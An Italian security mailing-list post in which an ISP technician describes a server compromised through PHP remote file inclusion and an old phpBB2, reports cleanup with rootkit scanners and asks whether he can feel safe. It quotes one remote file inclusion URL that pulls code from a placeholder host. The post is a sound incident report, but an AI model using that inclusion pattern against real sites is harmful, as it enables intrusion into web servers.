I clienti qualche giorno fa mi segnalano la rete bloccata.. dopo qualche
oretta di controlli trovo che un server è passato da un 1000
pacchetti/sec a più di 800.000..
Faccio altri controlli e trovo un po' di schifezze passate tramite
url_fopen di php e tramite un phpBB2 vecchio di n anni e un paio di irc
che girano allegri.
l'idea iniziale è ovviamente quella di spianare il tutto però mi
ricordavi di aver tenuto d'occhio quel server per quanto riguarda le
cose importanti (kernel, librerie varie ecc ecc) e infatti il
serveruccio irc è lanciato come nobody.
Quindi metto in sicurezza gli script (leggi:li razzo di brutto) e faccio
dei test con i soliti programmini.
Per rkhunter e per chkrootkit è tutto a posto, controllando con dei
binari corretti le date dei vari ls, netstat ecc sono coerenti (e
d'altra parte rkhunter controlla gli md5 della distribuzione), dopo
adeguata pulizia ci sono stati molti tentativi di caricare altre
schifezze, tentativi tutti falliti e nessun programma o porta sospetta
sono aperti.
Mi devo sentire relativamente tranquillo?
Un'altra cosa: passi per phpBB2 che aveva delle vulnerabilità
conosciute, ma come hanno trovato uno stupido script tipo
index.php?pag=intro (che genialata delle genialate prende il file intro
e lo visualizza), script che accetta anche una cosa tipo
index.php?pag=http://serverdelcavolo/id.txt?
Lo fanno i vari bot?
Quindi se si toglie lo spam e questi tentativi a vuoto generalizzati la
rete sarebbe completamente scarica...
--
Roberto Tagliaferri
Responsabile Progettazione & Produzione
TosNet s.r.l. - Internet Service Provider
[EMAIL PROTECTED]
www.tosnet.it
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
